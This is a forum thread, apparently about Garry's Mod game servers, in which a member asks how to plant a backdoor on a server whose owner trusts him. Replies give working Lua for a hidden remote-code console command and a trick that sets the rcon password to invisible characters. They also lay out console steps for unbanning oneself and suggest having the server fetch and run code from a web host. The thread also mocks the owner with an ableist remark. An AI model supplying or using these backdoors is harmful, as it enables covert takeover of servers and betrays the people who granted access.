SolvedHelp with a backdoor

Posts 1–10 of 10 · Page 1 of 1
Help with a backdoor
So there is this server, the owner has really bad autism and trusts me to edit files.

What file should I ask to edit to place a backdoor in?
Code:
concommand.Add("rs", function(p,c,a) pcall(RunString(tostring(a[1]))) end)
client console -> rs print('you're being hacked by <person you hate>')

Code for backdoor doesn't return errors!
I have superadmin, How would I go about finding the rcon pass?
Quote Originally Posted by HubbyDEV View Post
I have superadmin, How would I go about finding the rcon pass?
You can't it's impossible just use RunString as i put in my post, RunString = rcon basically!
Quote Originally Posted by suchisgood View Post
You can't it's impossible just use RunString as i put in my post, RunString = rcon basically!
I am a superadmin so I can run rcon commands, I am just wondering if I could grab the rcon from there so if he were to remove my rank I would still have rcon
Quote Originally Posted by HubbyDEV View Post
I am a superadmin so I can run rcon commands, I am just wondering if I could grab the rcon from there so if he were to remove my rank I would still have rcon
rs RunConsoleCommand('look its rcon')
Quote Originally Posted by fiireoxen View Post
rs RunConsoleCommand('look its rcon')
I mean for example if they were to ban me I could just unban myself with rcon
Quote Originally Posted by HubbyDEV View Post
I mean for example if they were to ban me I could just unban myself with rcon
rs game.ConsoleCommand("rcon_password ᅚᅚ\n")
Copy and paste it you'll notice there is a large invisible block [ᅚᅚ] there that can't be seen so they won't think it's changed!

in your console

rcon_address <server ip>
rcon_password ᅚᅚ
rcon removeid <yourid>
Enjoy!
or make it download code from http website and then run in. I did that on a test server once, its pretty solid since even if they change rcon password ur still able to run code, just have a
Code:
if not codeHasBeenrRun then 
 codeHasBeenRun = true
 unBan(me)
end
to stop spam of code
Posts 1–10 of 10 · Page 1 of 1
This thread is closed for replies.

Similar Threads

Tags for this Thread

None

Talk with us